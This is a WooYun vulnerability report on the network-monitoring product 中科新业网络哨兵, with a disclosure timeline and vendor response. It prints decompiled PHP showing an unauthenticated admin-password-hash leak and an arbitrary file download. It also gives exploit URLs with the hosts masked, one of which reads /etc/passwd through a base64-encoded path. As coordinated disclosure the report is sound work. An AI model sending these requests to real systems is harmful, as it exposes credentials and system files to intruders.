当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123359

漏洞标题:中科新业网络哨兵任意文件下载/管理员MD5密码泄露

相关厂商:中科新业

漏洞作者: menmen519

提交时间:2015-07-02 10:32

修复时间:2015-10-01 13:38

公开时间:2015-10-01 13:38

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-02: 细节已通知厂商并且等待厂商处理中
2015-07-03: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-07-06: 细节向第三方安全合作伙伴开放
2015-08-27: 细节向核心白帽子及相关领域专家公开
2015-09-06: 细节向普通白帽子公开
2015-09-16: 细节向实习白帽子公开
2015-10-01: 细节向公众公开

简要描述:

中科新业网络哨兵任意文件下载/管理员MD5密码泄露

详细说明:

getpasswd.php:

<?php
/*********************/
/* */
/* Dezend for PHP5 */
/* NWS */
/* Nulled.WS */
/* */
/*********************/
include( "../include/globalvar.h" );
include( "../include/connectdb.php" );
$sql = "SELECT password FROM tab_sys_user WHERE user_id='admin'";
$gDb->query( $sql, "N" );
$gDb->next_record( );
echo $gDb->Record['password'];
?>


直接echo了管理员的密码
直接看例子
**.**.**.**/ucenter/include/getpasswd.php
**.**.**.**/ucenter/include/getpasswd.php
**.**.**.**/ucenter/include/getpasswd.php
**.**.**.**/ucenter/include/getpasswd.php
**.**.**.**/ucenter/include/getpasswd.php
下来看看任意文件下载
downfile_decode.php:

<?php
/*********************/
/* */
/* Dezend for PHP5 */
/* NWS */
/* Nulled.WS */
/* */
/*********************/
function create_file( $filename, $flag, $type )
{
$fp = fopen( $filename, "w" );
$content = "<?xml version=\"1.0\" encoding=\"gb2312\"?>\r\n<Workbook xmlns=\"urn:schemas-microsoft-com:office:spreadsheet\"\r\n xmlns:x=\"urn:schemas-microsoft-com:office:excel\"\r\n xmlns:ss=\"urn:schemas-microsoft-com:office:spreadsheet\"\r\n xmlns:html=\"http://**.**.**.**/TR/REC-html40\">\r\n<Worksheet ss:Name=\"sheet_name\">\r\n<Table>\r\n<Column ss:Index=\"1\" ss:AutoFitWidth=\"0\" ss:Width=\"270\"/>\r\n<Row ss:Height=\"30\">\r\n<Cell><Data ss:Type=\"String\">title</Data></Cell>\r\n</Row>\r\n</Table>\r\n</Worksheet>\r\n</Workbook>";
case "account" :
$sheet_name = "虚拟账号布控";
$title = "虚拟账号";
break;
case "content" :
$sheet_name = "关键字布控";
$title = "关键字";
break;
case "mac" :
$sheet_name = "MAC地址布控";
$title = "MAC地址";
break;
case "realname" :
$sheet_name = "实名布控";
$title = "姓名";
break;
case "card" :
$sheet_name = "证件号码布控";
$title = "证件号码";
break;
case "address" :
$sheet_name = "目标地址布控";
$title = "目标地址";
break;
$title .= "(注:请使用文本格式; 数字前加 ' 符.)";
$content = str_replace( "sheet_name", $sheet_name, $content );
$content = str_replace( "title", $title, $content );
fwrite( $fp, $content );
fclose( $fp );
}
$gFilePath = $_GET['gFilePath'];
$gFilePath = base64_decode( $gFilePath );
$gFileName = substr( strrchr( $gFilePath, "/" ), 1 );
if ( !is_readable( substr( $gFilePath, 0, strrpos( $gFilePath, "/" ) ) ) )
{
echo "权限禁止!";
exit( );
}
else if ( !file_exists( $gFilePath ) )
{
create_file( $gFilePath, $_GET['flag'], $_GET['type'] );
}
$fp = fopen( $gFilePath, "r" );
header( "Content-type: application/octet-stream" );
header( "Accept-Ranges: bytes" );
header( "Accept-Length: ".filesize( $gFilePath ) );
header( "Content-Disposition: attachment; filename=".$gFileName );
echo fread( $fp, filesize( $gFilePath ) );
fclose( $fp );
exit( );
?>


直接看例子
**.**.**.**/ucenter/include/downfile_decode.php?gFilePath=L2V0Yy9wYXNzd2Q%3D
**.**.**.**/ucenter/include/downfile_decode.php?gFilePath=L2V0Yy9wYXNzd2Q%3D
**.**.**.**/ucenter/include/downfile_decode.php?gFilePath=L2V0Yy9wYXNzd2Q%3D
**.**.**.**/ucenter/include/downfile_decode.php?gFilePath=L2V0Yy9wYXNzd2Q%3D
**.**.**.**/ucenter/include/downfile_decode.php?gFilePath=L2V0Yy9wYXNzd2Q%3D
不一一举例子了

漏洞证明:

修复方案:

版权声明:转载请注明来源 menmen519@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-03 13:36

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无